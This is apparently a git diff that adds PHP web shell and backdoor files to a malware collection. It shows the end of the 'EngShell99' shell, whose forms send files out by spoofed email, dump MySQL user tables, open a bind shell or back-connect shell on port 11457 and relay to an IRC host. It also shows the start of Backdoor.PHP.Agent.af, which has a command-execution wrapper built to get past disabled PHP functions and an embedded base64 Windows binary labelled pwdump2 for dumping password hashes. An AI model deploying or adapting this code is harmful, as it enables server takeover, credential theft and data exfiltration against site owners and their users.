"; +echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("iamnothacker@yahoo.co.id"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("admin@fbi.gov")))); +echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello hacker")))); +echo sr(25,"".$lang[$language.'_text108'].$arrow."",''); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text104']."
"; +echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("iamnothacker@yahoo.co.id"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("admin@fbi.gov")))); +echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from EngShell99")))); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."".$fe.""; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = ''; +echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."".$fs."".$ts; +echo "
".$lang[$language.'_text40']."
"; +echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); +echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' . '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."".$lang[$language.'_text41'].$arrow."",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text83']."
"; +echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); +echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."

".in('submit','submit',0,$lang[$language.'_butt1'])."
".$fe.""; +} +if(!$safe_mode&&$unix){ +echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."".$fs."".$ts; +echo "
".$lang[$language.'_text9']."
"; +echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',15,'11457')); +echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',15,'e99')); +echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text12']."
"; +echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'11457')); +echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text22']."
"; +echo sr(40,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',15,'11457')); +echo sr(40,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',15,'6667')); +echo sr(40,"".$lang[$language.'_text26'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."".$fe.""; +} +echo ''.$table_up3."
o-[ HackArt - EngShell99 version ".$version." ]-o
".$f; +echo ''; +?> diff --git a/PHP/Backdoor.PHP.Agent.af b/PHP/Backdoor.PHP.Agent.af new file mode 100644 index 00000000..e76b8a08 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.af @@ -0,0 +1,8346 @@ +&1","r"))) { +return 126; +} +while (!feof($p)) { +$line=fgets($p,1000); +$out .= $line; +} +pclose($p); +return $out; +} +}else{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ''; + if (!empty($cmd)) + { + if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ''; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +} + +$pwdump2="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 